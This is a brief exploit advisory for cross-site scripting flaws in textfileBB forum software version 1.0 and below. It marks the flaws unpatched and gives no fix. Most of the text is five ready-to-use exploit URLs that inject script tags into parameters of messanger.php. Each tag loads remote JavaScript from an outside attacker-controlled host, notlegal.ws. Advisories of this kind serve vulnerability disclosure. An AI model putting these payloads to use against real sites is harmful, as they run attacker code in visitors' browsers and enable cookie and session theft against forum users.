textfileBB versions 1.0 and below suffer from multiple cross site scripting flaws.
5eb4e5cf22834d35068ecfd02e8d2c4ff8cab55454516658027b2915c06aa0f1
ORIGIONAL: https://notlegal.ws/textfilebbmessanger.txt
software: textfileBB
vendors website: https://tfbb.jcink.com/
versions: <= 1.0
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: medium
exploit(s):
https://example.com/messanger.php?mess=%3Cscript%20src=https://notlegal.ws/xss.js%3E%3C/script%3E
https://example.com/messanger.php?p=MSN&user=%3Cscript%20src=https://notlegal.ws/xss.js%3E%3C/script%3E
https://example.com/messanger.php?p=YIM&user=%3Cscript%20src=https://notlegal.ws/xss.js%3E%3C/script%3E
https://example.com/messanger.php?p=ICQ&user=%3Cscript%20src=https://notlegal.ws/xss.js%3E%3C/script%3E
https://example.com/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%3Cscript%20src=https://notlegal.ws/xss.js%3E%3C/body%3E%3C/html%3E
credit:
author(s): retard
email: retard@30gigs.com